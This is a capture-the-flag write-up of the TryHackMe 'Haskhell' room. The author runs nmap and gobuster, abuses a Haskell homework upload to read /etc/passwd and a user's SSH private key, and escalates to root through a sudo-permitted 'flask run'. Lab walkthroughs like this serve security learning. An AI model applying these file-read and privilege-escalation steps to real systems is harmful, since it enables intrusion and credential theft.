THM - Haskhell
Show your professor that his PhD isn’t in security. Not much to go on there. Haskell is a programming language that I don’t know anything about. Let’s go!
nmap says we’ve got 22 (SSH) and 5001, which is a non-standard port.
5001/tcp open http syn-ack ttl 63 Gunicorn 19.7.1
Gunicorn is a ‘Python Web Server Gateway Interface HTTP server’ according to Wikipeda.
Visting http://10.10.222.186:5001/ shows we have a webserver running on this port, to do with Functional Programming 220. There is a link to /homework1 which contains some instructions, and assigned work is supposed to be submitted to /upload. The upload function supposedly accepts Haskell files only. Unfortunately, the linked /upload returns a 404.
It also says that Your file will be compiled and ran and all output will be piped to a file under the uploads directory.
root@kali:/opt/tryhackme/haskhell# gobuster dir -u http://10.10.222.186:5001/ -w /usr/share/dirb/wordlists/common.txt
Running dirbuster with the common wordlist reveals a page called /submit, and that appears to be what the /upload was supposed to be.
Creating a valid haskell file (hello, world of course!), we can upload it:
main=putStrLn “Hello, World!”
And actually it gets shown to us: http://10.10.222.186:5001/uploads/fib.hs
[1 of 1] Compiling Main ( /home/flask/uploads/fib.hs, /home/flask/uploads/fib.o ) Linking /home/flask/uploads/fib …
So, what can we do with that??
Well, we can read a file for a start:
main = do
s <- readFile “/etc/passwd”
doSomethingWith :: String -> IO ()
doSomethingWith str = putStrLn str
Unfortunately we can’t open /etc/shadow :)
We can do some guessing - first I tried /home/prof/.profile, and that worked … so what if we try /home/prof/.ssh/id_rsa? Bingo!
I won’t paste it here, but we’ve got the private key for ‘prof’ and once we chmod 600 on it we can login:
root@kali:/opt/tryhackme/haskhell# ssh -i id_rsa firstname.lastname@example.org Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
Prof has the user flag, so that’s sweet.
Running sudo -l, prof can do:
User prof may run the following commands on haskhell:
(root) NOPASSWD: /usr/bin/flask run
Flask is a micro web framework written in Python, so let’s make the most super basic Python thing you can imagine:
prof@haskhell:/root# cat /dev/shm/app.py
Now this isn’t a flask app, but it doesn’t matter. Next, we set our environment variable:
$ export FLASK_APP=app.py
And we do this:
prof@haskhell:/dev/shm$ sudo /usr/bin/flask run
Boom. I had so little trouble with this I feel like I must’ve cheated by guessing the presence of id_rsa, and I didn’t consult any walkthroughs. Maybe I’m just levelling up.